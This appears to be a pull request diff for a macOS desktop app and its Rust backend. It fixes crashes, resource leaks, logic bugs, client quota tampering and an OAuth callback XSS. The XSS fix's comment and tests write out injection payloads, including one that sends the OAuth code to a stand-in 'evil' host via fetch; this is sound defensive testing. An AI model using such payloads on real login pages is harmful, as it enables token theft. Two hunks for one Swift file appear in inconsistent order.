### PR TITLE
fix(desktop): macOS bug sweep — crashes, data loss, XSS, and logic defects

### DIFF
--- a/desktop/macos/Backend-Rust/src/routes/auth.rs
+++ b/desktop/macos/Backend-Rust/src/routes/auth.rs
@@ -729,22 +729,58 @@ async fn generate_custom_token(
     Err("Custom token generation requires Firebase Admin SDK - not yet implemented in Rust".into())
 }
 
+/// Escape a value for safe interpolation into a double-quoted JavaScript string
+/// literal inside an inline `<script>` element.
+///
+/// `state` and `redirect_uri` are fully attacker-controllable (they are echoed
+/// back verbatim from the unauthenticated `/v1/auth/authorize` query params), and
+/// `code`/`error` come from the OAuth provider. The callback template drops all
+/// four straight into `const x = "{{ ... }}";`. Without escaping, a value such as
+/// `";fetch("https://evil/?c="+code);//` breaks out of the string literal and runs
+/// arbitrary script in the backend's origin; a literal `</script>` sequence would
+/// likewise terminate the element. Neutralize both by escaping the string-literal
+/// metacharacters and the angle brackets / slash that could re-open HTML parsing.
+fn js_string_escape(value: &str) -> String {
+    let mut escaped = String::with_capacity(value.len());
+    for ch in value.chars() {
+        match ch {
+            '\\' => escaped.push_str("\\\\"),
+            '"' => escaped.push_str("\\\""),
+            '\n' => escaped.push_str("\\n"),
+            '\r' => escaped.push_str("\\r"),
+            '\t' => escaped.push_str("\\t"),
+            // Prevent `</script>` / `<!--` from re-entering HTML parsing and
+            // stop `/` from forming a closing tag.
+            '<' => escaped.push_str("\\u003C"),
+            '>' => escaped.push_str("\\u003E"),
+            '/' => escaped.push_str("\\/"),
+            // JS treats these as line terminators inside string literals.
+            '\u{2028}' => escaped.push_str("\\u2028"),
+            '\u{2029}' => escaped.push_str("\\u2029"),
+            other => escaped.push(other),
+        }
+    }
+    escaped
+}
+
 fn render_auth_callback(
     code: &str,
     state: &str,
     redirect_uri: &str,
     error: Option<&str>,
 ) -> String {
-    // Load template and replace placeholders
+    // Load template and replace placeholders. Every substituted value lands inside
+    // a JS string literal in an inline <script>, so each must be JS-string-escaped
+    // to close the injection class (see js_string_escape).
     let template = include_str!("../../templates/auth_callback.html");
 
     template
-        .replace("{{ code }}", code)
-        .replace("{{ state }}", state)
-        .replace("{{ redirect_uri }}", redirect_uri)
+        .replace("{{ code }}", &js_string_escape(code))
+        .replace("{{ state }}", &js_string_escape(state))
+        .replace("{{ redirect_uri }}", &js_string_escape(redirect_uri))
         .replace(
             "{{ error if error is defined else '' }}",
-            error.unwrap_or(""),
+            &js_string_escape(error.unwrap_or("")),
         )
 }
 
@@ -783,5 +819,69 @@ mod tests {
     fn auth_base_url_accepts_nonblank_values() {
         assert!(is_nonblank_url("https://desktop-backend.example.com"));
         assert!(is_nonblank_url("  https://desktop-backend.example.com  "));
+    }
+
+    #[test]
+    fn js_string_escape_neutralizes_string_literal_breakout() {
+        // A `state`/`redirect_uri` payload crafted to break out of
+        // `const state = "...";` and run arbitrary script.
+        let payload = "\";fetch('https://evil/?c='+code);//";
+        let escaped = js_string_escape(payload);
+        // The leading quote that would close the literal is now escaped, and every
+        // double-quote in the output is backslash-escaped (none can close it).
+        assert!(
+            escaped.starts_with("\\\""),
+            "leading quote escaped: {escaped}"
+        );
+        let bytes = escaped.as_bytes();
+        for (i, &b) in bytes.iter().enumerate() {
+            if b == b'"' {
+                assert!(
+                    i > 0 && bytes[i - 1] == b'\\',
+                    "unescaped quote in {escaped}"
+                );
+            }
+        }
+    }
+
+    #[test]
+    fn js_string_escape_neutralizes_script_tag_breakout() {
+        let escaped = js_string_escape("</script><script>alert(1)</script>");
+        // A literal `</script>` must never survive — it would terminate the
+        // inline <script> element regardless of the JS string context.
+        assert!(
+            !escaped.contains("</script>") && !escaped.contains("</"),
+            "closing tag escaped: {escaped}"
+        );
+        assert!(!escaped.contains('<') && !escaped.contains('>'));
+    }
+
+    #[test]
+    fn js_string_escape_preserves_legitimate_redirect_uris() {
+        // Real desktop redirect_uris contain no metacharacters, so escaping is a
+        // no-op and the OAuth flow is unaffected.
+        assert_eq!(
+            js_string_escape("omi-computer://auth/callback"),
+            "omi-computer:\\/\\/auth\\/callback"
+        );
+        assert_eq!(
+            js_string_escape("http://127.0.0.1:52001/callback"),
+            "http:\\/\\/127.0.0.1:52001\\/callback"
+        );
+    }
+
+    #[test]
+    fn render_auth_callback_escapes_all_interpolated_values() {
+        let html = render_auth_callback(
+            "code\"injected",
+            "</script><script>alert(1)</script>",
+            "https://evil\";document.location='x';//",
+            None,
+        );
+        // The rendered page must not contain an unescaped closing script tag or a
+        // raw injected quote from any of the three attacker-influenced values.
+        assert!(!html.contains("</script><script>"));
+        assert!(!html.contains("code\"injected"));
+        assert!(!html.contains("evil\";document"));
     }
 }

--- a/desktop/macos/Backend-Rust/src/routes/rate_limit.rs
+++ b/desktop/macos/Backend-Rust/src/routes/rate_limit.rs
@@ -158,19 +158,23 @@ impl GeminiRateLimiter {
         };
 
         let now = Instant::now();
-        let burst_cutoff = now - Duration::from_secs(BURST_WINDOW_SECS);
+        // `Instant - Duration` panics ("overflow when subtracting duration from
+        // instant") if the monotonic clock base is younger than the window — a
+        // latent panic on a freshly started process. `checked_sub` -> None means
+        // nothing can be older than the cutoff, so there is nothing to prune.
+        let burst_cutoff = now.checked_sub(Duration::from_secs(BURST_WINDOW_SECS));
 
         // Phase 2: Fast-path local checks (conservative rejections only)
         {
             let mut cache = self.cache.lock().await;
             if let Some(entry) = cache.get_mut(uid) {
                 // Prune stale burst entries
-                while entry
-                    .local_burst
-                    .front()
-                    .map_or(false, |&t| t < burst_cutoff)
-                {
-                    entry.local_burst.pop_front();
+                while let Some(cutoff) = burst_cutoff {
+                    if entry.local_burst.front().map_or(false, |&t| t < cutoff) {
+                        entry.local_burst.pop_front();
+                    } else {
+                        break;
+                    }
                 }
 
                 // Fast reject on local burst (this instance alone has seen >= cap)
@@ -215,12 +219,12 @@ impl GeminiRateLimiter {
                 }
 
                 // Track burst locally
-                while entry
-                    .local_burst
-                    .front()
-                    .map_or(false, |&t| t < burst_cutoff)
-                {
-                    entry.local_burst.pop_front();
+                while let Some(cutoff) = burst_cutoff {
+                    if entry.local_burst.front().map_or(false, |&t| t < cutoff) {
+                        entry.local_burst.pop_front();
+                    } else {
+                        break;
+                    }
                 }
                 entry.local_burst.push_back(now);
 
@@ -248,8 +252,12 @@ impl GeminiRateLimiter {
     pub async fn evict_stale(&self) {
         let now = Instant::now();
         let mut cache = self.cache.lock().await;
-        // Remove entries whose cache expired more than 5 minutes ago
-        let stale_cutoff = now - Duration::from_secs(300);
+        // Remove entries whose cache expired more than 5 minutes ago. `checked_sub`
+        // guards against an `Instant - Duration` panic when the process has been up
+        // less than the window; None means nothing is stale enough to evict yet.
+        let Some(stale_cutoff) = now.checked_sub(Duration::from_secs(300)) else {
+            return;
+        };
         cache.retain(|_, entry| entry.expires_at > stale_cutoff);
     }
 }

--- a/desktop/macos/Backend-Rust/src/routes/realtime.rs
+++ b/desktop/macos/Backend-Rust/src/routes/realtime.rs
@@ -484,11 +484,13 @@ struct UsageReport {
 
 fn usage_cost(r: &UsageReport) -> f64 {
     let rates = realtime_rates(&r.provider, &r.model);
-    (r.input_text_tokens as f64 * rates.in_text
-        + r.input_audio_tokens as f64 * rates.in_audio
-        + r.input_cached_tokens as f64 * rates.cached
-        + r.output_text_tokens as f64 * rates.out_text
-        + r.output_audio_tokens as f64 * rates.out_audio)
+    // Token counts are fully client-reported. Clamp negatives to 0 so a tampered
+    // client cannot drive `cost` (and the Firestore cost/quota ledger) negative.
+    (r.input_text_tokens.max(0) as f64 * rates.in_text
+        + r.input_audio_tokens.max(0) as f64 * rates.in_audio
+        + r.input_cached_tokens.max(0) as f64 * rates.cached
+        + r.output_text_tokens.max(0) as f64 * rates.out_text
+        + r.output_audio_tokens.max(0) as f64 * rates.out_audio)
         / 1_000_000.0
 }
 
@@ -498,9 +500,12 @@ async fn report_usage(
     user: PaywalledAuthUser,
     Json(report): Json<UsageReport>,
 ) -> StatusCode {
-    let input = report.input_text_tokens + report.input_audio_tokens;
-    let output = report.output_text_tokens + report.output_audio_tokens;
-    let cached = report.input_cached_tokens;
+    // Token counts are fully client-reported; clamp negatives to 0 before summing
+    // so a tampered client cannot record negative usage that understates cost or
+    // resets accrued quota in the shared llm_usage ledger.
+    let input = report.input_text_tokens.max(0) + report.input_audio_tokens.max(0);
+    let output = report.output_text_tokens.max(0) + report.output_audio_tokens.max(0);
+    let cached = report.input_cached_tokens.max(0);
     let total = input + output + cached;
     if total <= 0 {
         return StatusCode::NO_CONTENT;
@@ -549,6 +554,48 @@ pub fn realtime_routes() -> Router<AppState> {
 #[cfg(test)]
 mod tests {
     use super::*;
+
+    #[test]
+    fn usage_cost_never_negative_for_negative_client_tokens() {
+        // A tampered client reporting negative token counts must not yield a
+        // negative cost that would understate/negate the shared cost ledger.
+        let report = UsageReport {
+            provider: "openai".to_string(),
+            model: String::new(),
+            input_text_tokens: -1_000_000,
+            input_audio_tokens: -1_000_000,
+            input_cached_tokens: -1_000_000,
+            output_text_tokens: -1_000_000,
+            output_audio_tokens: -1_000_000,
+        };
+        assert_eq!(usage_cost(&report), 0.0);
+    }
+
+    #[test]
+    fn usage_cost_ignores_negative_fields_but_counts_positive_ones() {
+        // A mix of one legitimate positive field and negative padding must equal
+        // the cost of the positive field alone (negatives clamped, not subtracted).
+        let mixed = UsageReport {
+            provider: "openai".to_string(),
+            model: String::new(),
+            input_text_tokens: 1000,
+            input_audio_tokens: -5000,
+            input_cached_tokens: -5000,
+            output_text_tokens: 0,
+            output_audio_tokens: 0,
+        };
+        let positive_only = UsageReport {
+            provider: "openai".to_string(),
+            model: String::new(),
+            input_text_tokens: 1000,
+            input_audio_tokens: 0,
+            input_cached_tokens: 0,
+            output_text_tokens: 0,
+            output_audio_tokens: 0,
+        };
+        assert_eq!(usage_cost(&mixed), usage_cost(&positive_only));
+        assert!(usage_cost(&mixed) > 0.0);
+    }
 
     #[test]
     fn gemini_auth_token_body_is_flat_at_request_root() {

--- a/desktop/macos/Desktop/Sources/APIKeyService.swift
+++ b/desktop/macos/Desktop/Sources/APIKeyService.swift
@@ -115,6 +115,13 @@ final class APIKeyService: ObservableObject {
                 // Set env vars so existing getenv() consumers keep working during transition
                 applyToEnvironment()
 
+                // Clear the completed task on the success path too (not just on the
+                // all-attempts-failed path below). Otherwise a stale finished task
+                // lingers; after sign-out (clear() sets isLoaded=false) the fetchTask
+                // == nil guards in startFetchingKeys()/waitForKeys() never fire, so a
+                // re-login can never refetch keys until the app is relaunched.
+                fetchTask = nil
+
                 log("APIKeyService: Fetched keys from backend (gemini=\(keys.geminiApiKey != nil), firebase=\(keys.firebaseApiKey != nil), calendar=\(keys.googleCalendarApiKey != nil))")
                 return
             } catch {
@@ -141,6 +148,10 @@ final class APIKeyService: ObservableObject {
         googleCalendarApiKey = nil
         isLoaded = false
         loadError = nil
+        // Drop any completed/in-flight fetch task so the next sign-in can start a
+        // fresh fetch — the fetchTask == nil guards would otherwise block it.
+        fetchTask?.cancel()
+        fetchTask = nil
 
         unsetenv("GEMINI_API_KEY")
         // NOTE: Do NOT unset FIREBASE_API_KEY — it's needed for the next sign-in

--- a/desktop/macos/Desktop/Sources/AuthService.swift
+++ b/desktop/macos/Desktop/Sources/AuthService.swift
@@ -2461,6 +2461,13 @@ class AuthService {
             await ProactiveStorage.shared.invalidateCache()
             await NoteStorage.shared.invalidateCache()
             await AIUserProfileService.shared.invalidateCache()
+            // These per-user storages cache a DatabasePool bound to the previous
+            // user's omi.db. Without invalidation the next signed-in user reads and
+            // writes the prior account's staged tasks, goals, and task-chat history
+            // until the app is relaunched (cross-account data leak).
+            await StagedTaskStorage.shared.invalidateCache()
+            await GoalStorage.shared.invalidateCache()
+            await TaskChatMessageStorage.shared.invalidateCache()
         }
 
         // Notify observers (DesktopHomeView) to reset @AppStorage-backed properties directly.

--- a/desktop/macos/Desktop/Sources/Bluetooth/Connections/BeeDeviceConnection.swift
+++ b/desktop/macos/Desktop/Sources/Bluetooth/Connections/BeeDeviceConnection.swift
@@ -125,22 +125,43 @@ final class BeeDeviceConnection: BaseDeviceConnection {
         guard data.count >= 2 else { return nil }
 
         audioBuffer.append(contentsOf: data.dropFirst(2))
+        return Self.nextADTSFrame(from: &audioBuffer)
+    }
 
-        while audioBuffer.count >= 7 {
+    /// Pop the next complete ADTS/AAC frame from `buffer`, skipping leading
+    /// non-sync or malformed-header bytes. Returns nil when no complete valid
+    /// frame is available yet.
+    ///
+    /// A valid ADTS frame is at least 7 bytes (the header length is part of the
+    /// frameLength field). A decoded `frameLength < 7` — e.g. a false sync where
+    /// 0xFF 0xFx matched inside AAC payload after a dropped BLE notification — was
+    /// previously accepted: `buffer.count >= 0` is always true, `prefix(0)` is
+    /// empty, and `removeFirst(0)` advances nothing, so the corrupt header stayed
+    /// at the head and every later packet re-hit it — audio went permanently
+    /// silent while the buffer grew without bound. Treat `< 7` as a false sync and
+    /// advance one byte so the scanner keeps making progress.
+    static func nextADTSFrame(from buffer: inout [UInt8]) -> [UInt8]? {
+        while buffer.count >= 7 {
             // Look for ADTS sync word (0xFF 0xFx)
-            guard audioBuffer[0] == 0xFF, (audioBuffer[1] & 0xF0) == 0xF0 else {
-                audioBuffer.removeFirst()
+            guard buffer[0] == 0xFF, (buffer[1] & 0xF0) == 0xF0 else {
+                buffer.removeFirst()
                 continue
             }
 
             // Extract frame length from ADTS header
-            let frameLength = (Int(audioBuffer[3] & 0x03) << 11) |
-                              (Int(audioBuffer[4]) << 3) |
-                              (Int(audioBuffer[5] & 0xE0) >> 5)
+            let frameLength = (Int(buffer[3] & 0x03) << 11) |
+                              (Int(buffer[4]) << 3) |
+                              (Int(buffer[5] & 0xE0) >> 5)
 
-            if audioBuffer.count >= frameLength {
-                let frame = Array(audioBuffer.prefix(frameLength))
-                audioBuffer.removeFirst(frameLength)
+            guard frameLength >= 7 else {
+                // False sync: 0xFF 0xFx matched but the header is invalid.
+                buffer.removeFirst()
+                continue
+            }
+
+            if buffer.count >= frameLength {
+                let frame = Array(buffer.prefix(frameLength))
+                buffer.removeFirst(frameLength)
                 return frame
             }
             break

--- a/desktop/macos/Desktop/Sources/Bluetooth/Connections/PlaudDeviceConnection.swift
+++ b/desktop/macos/Desktop/Sources/Bluetooth/Connections/PlaudDeviceConnection.swift
@@ -131,20 +131,36 @@ final class PlaudDeviceConnection: BaseDeviceConnection {
             withResponse: true
         )
 
-        // Wait for response with timeout
+        // Wait for response with timeout.
+        //
+        // Both the timeout task and the response sink race to resume the same
+        // continuation, so a raw `continuation.resume` on each path double-resumes
+        // (a fatalError). Cancelling the timeout task does NOT prevent it either:
+        // `try? await Task.sleep` swallows the CancellationError and falls through
+        // to the resume. A lock-guarded one-shot ensures exactly one resume wins.
         return await withCheckedContinuation { continuation in
+            let resumeLock = NSLock()
+            var didResume = false
+            func resumeOnce(_ value: [UInt8]?) {
+                resumeLock.lock()
+                defer { resumeLock.unlock() }
+                guard !didResume else { return }
+                didResume = true
+                continuation.resume(returning: value)
+            }
+
             var cancellable: AnyCancellable?
             let timeoutTask = Task {
                 try? await Task.sleep(nanoseconds: 10_000_000_000) // 10 seconds
                 cancellable?.cancel()
-                continuation.resume(returning: nil)
+                resumeOnce(nil)
             }
 
             cancellable = commandQueues[cmdId]?
                 .first()
                 .sink { response in
                     timeoutTask.cancel()
-                    continuation.resume(returning: response)
+                    resumeOnce(response)
                 }
         }
     }

--- a/desktop/macos/Desktop/Sources/Bluetooth/Transports/BleTransport.swift
+++ b/desktop/macos/Desktop/Sources/Bluetooth/Transports/BleTransport.swift
@@ -37,7 +37,13 @@ final class BleTransport: NSObject, DeviceTransport {
     private var serviceDiscoveryContinuation: CheckedContinuation<[CBService], Error>?
 
     private var isDisposed = false
-    private var centralManagerObserver: NSObjectProtocol?
+    // All block-based NotificationCenter observer tokens. Every token must be
+    // stored and removed individually in deinit: `removeObserver(self)` does NOT
+    // remove block-based observers (they are keyed by the returned token, not by
+    // `self`), so a discarded token leaks the observer and its closure for the
+    // process lifetime — and DeviceProvider recreates transports on every
+    // reconnect attempt, so leaks accumulate unboundedly.
+    private var connectionObservers: [NSObjectProtocol] = []
 
     // MARK: - Initialization
 
@@ -53,43 +59,46 @@ final class BleTransport: NSObject, DeviceTransport {
     private func setupConnectionObserver() {
         // Observe connection state changes via NotificationCenter
         // BluetoothManager posts these when CBCentralManagerDelegate methods fire
-        centralManagerObserver = NotificationCenter.default.addObserver(
-            forName: .bleDeviceConnected,
-            object: nil,
-            queue: .main
-        ) { [weak self] notification in
-            guard let self = self,
-                  let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
-                  peripheralId == self.peripheral.identifier else { return }
+        connectionObservers.append(
+            NotificationCenter.default.addObserver(
+                forName: .bleDeviceConnected,
+                object: nil,
+                queue: .main
+            ) { [weak self] notification in
+                guard let self = self,
+                      let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
+                      peripheralId == self.peripheral.identifier else { return }
 
-            self.handleConnectionSuccess()
-        }
+                self.handleConnectionSuccess()
+            })
 
-        NotificationCenter.default.addObserver(
-            forName: .bleDeviceDisconnected,
-            object: nil,
-            queue: .main
-        ) { [weak self] notification in
-            guard let self = self,
-                  let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
-                  peripheralId == self.peripheral.identifier else { return }
+        connectionObservers.append(
+            NotificationCenter.default.addObserver(
+                forName: .bleDeviceDisconnected,
+                object: nil,
+                queue: .main
+            ) { [weak self] notification in
+                guard let self = self,
+                      let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
+                      peripheralId == self.peripheral.identifier else { return }
 
-            let error = notification.userInfo?["error"] as? Error
-            self.handleDisconnection(error: error)
-        }
+                let error = notification.userInfo?["error"] as? Error
+                self.handleDisconnection(error: error)
+            })
 
-        NotificationCenter.default.addObserver(
-            forName: .bleDeviceFailedToConnect,
-            object: nil,
-            queue: .main
-        ) { [weak self] notification in
-            guard let self = self,
-                  let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
-                  peripheralId == self.peripheral.identifier else { return }
+        connectionObservers.append(
+            NotificationCenter.default.addObserver(
+                forName: .bleDeviceFailedToConnect,
+                object: nil,
+                queue: .main
+            ) { [weak self] notification in
+                guard let self = self,
+                      let peripheralId = notification.userInfo?["peripheralId"] as? UUID,
+                      peripheralId == self.peripheral.identifier else { return }
 
-            let error = notification.userInfo?["error"] as? Error
-            self.handleConnectionFailure(error: error)
-        }
+                let error = notification.userInfo?["error"] as? Error
+                self.handleConnectionFailure(error: error)
+            })
     }
 
     private func handleConnectionSuccess() {
@@ -113,9 +122,12 @@ final class BleTransport: NSObject, DeviceTransport {
     }
 
     deinit {
-        if let observer = centralManagerObserver {
+        // Remove every block-based observer by its token (removeObserver(self)
+        // does not cover them). Missing any one leaks that observer + closure.
+        for observer in connectionObservers {
             NotificationCenter.default.removeObserver(observer)
         }
+        connectionObservers.removeAll()
         NotificationCenter.default.removeObserver(self)
     }
 

--- a/desktop/macos/Desktop/Sources/DesktopAutomationBridge.swift
+++ b/desktop/macos/Desktop/Sources/DesktopAutomationBridge.swift
@@ -3147,6 +3147,11 @@ final class DesktopAutomationBridge {
   private var bindAttempts = 0
   private let maxBindAttempts = 3
 
+  /// Upper bound on a request body's declared Content-Length. Requests over this
+  /// are rejected before the body is sliced (see parseRequest); the automation
+  /// bridge only ever receives small JSON action payloads.
+  static let maxRequestBodyBytes = 8 * 1024 * 1024
+
   private init() {}
 
   func startIfNeeded() {
@@ -3281,7 +3286,15 @@ final class DesktopAutomationBridge {
       let value = pieces[1].trimmingCharacters(in: .whitespaces)
       headers[key] = value
       if key == "content-length" {
-        contentLength = Int(value) ?? 0
+        // Reject negative/absurd lengths before the body-slice range and the
+        // `distance + contentLength` addition below (which would trap/overflow).
+        // Reachable pre-auth from any local process, so fail closed.
+        guard
+          let parsed = LoopbackHTTPParsing.parseContentLength(value, maxBytes: Self.maxRequestBodyBytes)
+        else {
+          return nil
+        }
+        contentLength = parsed
       }
     }
 

--- a/desktop/macos/Desktop/Sources/LocalAgentAPIServer.swift
+++ b/desktop/macos/Desktop/Sources/LocalAgentAPIServer.swift
@@ -113,6 +113,23 @@ struct LocalAgentTool {
   let annotations: [String: Any]
 }
 
+/// Shared parsing for the `Content-Length` header of the loopback HTTP servers
+/// (LocalAgentAPIServer + DesktopAutomationBridge). Both slice the body with
+/// `data.index(bodyStart, offsetBy: contentLength)`, which traps on a negative
+/// length, and add `contentLength` to a distance, which overflows on a huge one.
+/// Since both servers parse before authenticating, a malformed length from any
+/// local process would otherwise crash the whole app. Fail closed instead.
+enum LoopbackHTTPParsing {
+  /// Returns the validated body length, or `nil` if the header value is malformed,
+  /// negative, or exceeds `maxBytes` (caller should reject the request).
+  static func parseContentLength(_ value: String, maxBytes: Int) -> Int? {
+    guard let parsed = Int(value), parsed >= 0, parsed <= maxBytes else {
+      return nil
+    }
+    return parsed
+  }
+}
+
 final class LocalAgentAPIServer {
   static let shared = LocalAgentAPIServer()
   private static let maxRequestBytes = 1024 * 1024
@@ -230,10 +247,13 @@ final class LocalAgentAPIServer {
       let value = pieces[1].trimmingCharacters(in: .whitespaces)
       headers[key] = value
       if key == "content-length" {
-        contentLength = Int(value) ?? 0
-        if contentLength > Self.maxRequestBytes {
+        // Reject a negative/over-large length before it reaches the body-slice
+        // range below (which would trap on an unauthenticated request).
+        guard let parsed = LoopbackHTTPParsing.parseContentLength(value, maxBytes: Self.maxRequestBytes)
+        else {
           return nil
         }
+        contentLength = parsed
       }
     }
 

--- a/desktop/macos/Desktop/Sources/MainWindow/CrispManager.swift
+++ b/desktop/macos/Desktop/Sources/MainWindow/CrispManager.swift
@@ -7,6 +7,15 @@ import Foundation
 class CrispManager: ObservableObject {
     static let shared = CrispManager()
 
+    /// First-launch polling watermark, in epoch MILLISECONDS to match Crisp
+    /// message timestamps (`CrispOperatorMessage.timestamp` and the `?since=`
+    /// filter in the Rust route). Seeding this in seconds (~1e9) left it ~1000x
+    /// below every real message timestamp (~1e12), so the first poll treated all
+    /// historical operator messages as new and fired a notification for each.
+    nonisolated static func initialWatermark(now: Date = Date()) -> UInt64 {
+        UInt64(now.timeIntervalSince1970 * 1000)
+    }
+
     /// Number of unread operator messages (shown as badge in sidebar)
     @Published private(set) var unreadCount = 0
 
@@ -80,7 +89,7 @@ class CrispManager: ObservableObject {
         // On subsequent launches, keep the persisted value so the first
         // poll picks up messages that arrived while the app was closed.
         if lastSeenTimestamp == 0 {
-            lastSeenTimestamp = UInt64(Date().timeIntervalSince1970)
+            lastSeenTimestamp = Self.initialWatermark()
         }
 
         if performInitialPoll {

--- a/desktop/macos/Desktop/Sources/MainWindow/Pages/ConversationDetailView.swift
+++ b/desktop/macos/Desktop/Sources/MainWindow/Pages/ConversationDetailView.swift
@@ -919,9 +919,14 @@ struct ConversationDetailView: View {
                 Spacer()
             }
 
-            let memoryApps = appProvider.apps.filter {
-                $0.capabilities.contains("memories") &&
-                !displayConversation.appsResults.contains(where: { $0.appId == $0.id })
+            let memoryApps = appProvider.apps.filter { app in
+                // Name the outer element: inside the inner closure a bare `$0`
+                // shadows it, so `$0.appId == $0.id` compared an appsResults entry
+                // to itself (always true for any entry with a non-nil app_id, since
+                // AppResponse.id == appId ?? uuid), which excluded every app and
+                // left this section perpetually empty.
+                app.capabilities.contains("memories") &&
+                    !displayConversation.appsResults.contains(where: { $0.appId == app.id })
             }.prefix(4)
 
             if memoryApps.isEmpty && !appProvider.isLoading {

--- a/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/Insight/InsightAssistant.swift
+++ b/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/Insight/InsightAssistant.swift
@@ -137,8 +137,14 @@ actor InsightAssistant: ProactiveAssistant {
             // Grab the latest frame (may have been updated or cleared during sleep)
             guard let frame = pendingFrame else { continue }
             pendingFrame = nil
+            // Capture the previous analysis time BEFORE advancing it: the activity
+            // lookback window is "since the last analysis", so it must use the prior
+            // timestamp. Overwriting lastAnalysisTime first (and then reading it in
+            // extractAdvice) collapsed the window to ~0s, leaving every insight run
+            // with an empty activity summary.
+            let previousAnalysisTime = lastAnalysisTime
             lastAnalysisTime = Date()
-            await processFrame(frame)
+            await processFrame(frame, since: previousAnalysisTime)
         }
 
         log("Advice assistant stopped")
@@ -463,10 +469,10 @@ actor InsightAssistant: ProactiveAssistant {
 
     // MARK: - Analysis
 
-    private func processFrame(_ frame: CapturedFrame) async {
+    private func processFrame(_ frame: CapturedFrame, since previousAnalysisTime: Date) async {
         guard await isEnabled else { return }
         do {
-            guard let result = try await extractAdvice(from: frame) else {
+            guard let result = try await extractAdvice(from: frame, since: previousAnalysisTime) else {
                 return
             }
 
@@ -481,10 +487,14 @@ actor InsightAssistant: ProactiveAssistant {
         }
     }
 
-    private func extractAdvice(from frame: CapturedFrame) async throws -> InsightExtractionResult? {
+    private func extractAdvice(from frame: CapturedFrame, since previousAnalysisTime: Date) async throws
+        -> InsightExtractionResult?
+    {
         let now = Date()
-        // Cap lookback: since last analysis or max 1 hour ago
-        let lookbackStart = max(lastAnalysisTime, now.addingTimeInterval(-3600))
+        // Cap lookback: since last analysis or max 1 hour ago. Uses the previous
+        // analysis time captured before the loop advanced lastAnalysisTime — not
+        // the just-overwritten instance value (which would make the window ~0s).
+        let lookbackStart = max(previousAnalysisTime, now.addingTimeInterval(-3600))
         let (result, _) = try await runAdviceExtraction(
             jpegData: nil,
             appName: frame.appName,
@@ -583,7 +593,7 @@ actor InsightAssistant: ProactiveAssistant {
         var chosenScreenshotId: Int64?
         var investigationFindings: String?
 
-        for iteration in 0..<7 {
+        phase1Loop: for iteration in 0..<7 {
             let iterContents = contents
             let iterSystemPrompt = currentSystemPrompt
             let iterTools = [phase1Tools]
@@ -662,8 +672,11 @@ actor InsightAssistant: ProactiveAssistant {
                 ), sqlCount)
 
             default:
+                // `break` alone only exits the switch, leaving chosenScreenshotId
+                // nil, so the loop re-sent the identical request. Break the labeled
+                // loop to actually abort on an unknown tool call.
                 log("Insight: P1 unknown tool: \(toolCall.name), breaking")
-                break
+                break phase1Loop
             }
 
             // Break out of loop if request_screenshot was called

--- a/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskAssistant.swift
+++ b/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskAssistant.swift
@@ -1056,7 +1056,7 @@ actor TaskAssistant: ProactiveAssistant {
         var lastContextSummary = ""
         var lastCurrentActivity = ""
 
-        for iteration in 0..<8 {
+        toolLoop: for iteration in 0..<8 {
             let result = try await geminiClient.sendImageToolLoop(
                 contents: contents,
                 systemPrompt: currentSystemPrompt,
@@ -1300,8 +1300,11 @@ actor TaskAssistant: ProactiveAssistant {
                 continue
 
             default:
+                // `break` alone only exits the switch, so the loop re-sent the
+                // identical request up to 7 more times (cost + latency) on an
+                // unknown tool call. Break the labeled loop to actually abort.
                 log("Task: Unknown tool call: \(toolCall.name), breaking")
-                break
+                break toolLoop
             }
         }
 

--- a/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskDeduplicationService.swift
+++ b/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskDeduplicationService.swift
@@ -13,7 +13,7 @@ actor TaskDeduplicationService {
     /// told us to keep among the delete_ids — same group (`keep_id: t1,
     /// delete_ids: [t1, t2]`) or cross-group — and the old filter (existence only)
     /// would then hard-delete the canonical task, destroying the whole cluster.
-    nonisolated static func safeDeleteIDs(
+    static func safeDeleteIDs(
         deleteIDs: [String],
         validTaskIDs: Set<String>,
         protectedKeepIDs: Set<String>

--- a/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskDeduplicationService.swift
+++ b/desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskDeduplicationService.swift
@@ -7,6 +7,20 @@ import OmiSupport
 actor TaskDeduplicationService {
     static let shared = TaskDeduplicationService()
 
+    /// Delete IDs that are safe to hard-delete for a duplicate group. A delete ID
+    /// is safe only if it exists in this batch AND is not a keep_id of any group.
+    /// The model (a "pick one, delete the rest" prompt) sometimes lists the task it
+    /// told us to keep among the delete_ids — same group (`keep_id: t1,
+    /// delete_ids: [t1, t2]`) or cross-group — and the old filter (existence only)
+    /// would then hard-delete the canonical task, destroying the whole cluster.
+    nonisolated static func safeDeleteIDs(
+        deleteIDs: [String],
+        validTaskIDs: Set<String>,
+        protectedKeepIDs: Set<String>
+    ) -> [String] {
+        deleteIDs.filter { validTaskIDs.contains($0) && !protectedKeepIDs.contains($0) }
+    }
+
     private var geminiClient: GeminiClient?
     private var timer: Task<Void, Never>?
     private var isRunning = false
@@ -217,6 +231,9 @@ actor TaskDeduplicationService {
         // Validate and delete
         let validTaskIDs = Set(tasks.map { $0.id })
         let taskLookup = Dictionary(lastWriteWins: tasks.map { ($0.id, $0) })
+        // Every task the model told us to keep — across ALL groups — must never be
+        // hard-deleted, even if it also appears in some group's delete_ids.
+        let protectedKeepIDs = Set(result.duplicateGroups.map { $0.keepId })
         var deletedCount = 0
 
         for group in result.duplicateGroups {
@@ -226,9 +243,13 @@ actor TaskDeduplicationService {
                 continue
             }
 
-            let validDeleteIds = group.deleteIds.filter { validTaskIDs.contains($0) }
+            let validDeleteIds = Self.safeDeleteIDs(
+                deleteIDs: group.deleteIds,
+                validTaskIDs: validTaskIDs,
+                protectedKeepIDs: protectedKeepIDs
+            )
             if validDeleteIds.count != group.deleteIds.count {
-                log("TaskDedup: Some delete IDs not in input set, filtering")
+                log("TaskDedup: Some delete IDs not in input set or protected as a keep_id, filtering")
             }
 
             guard !validDeleteIds.isEmpty else { continue }

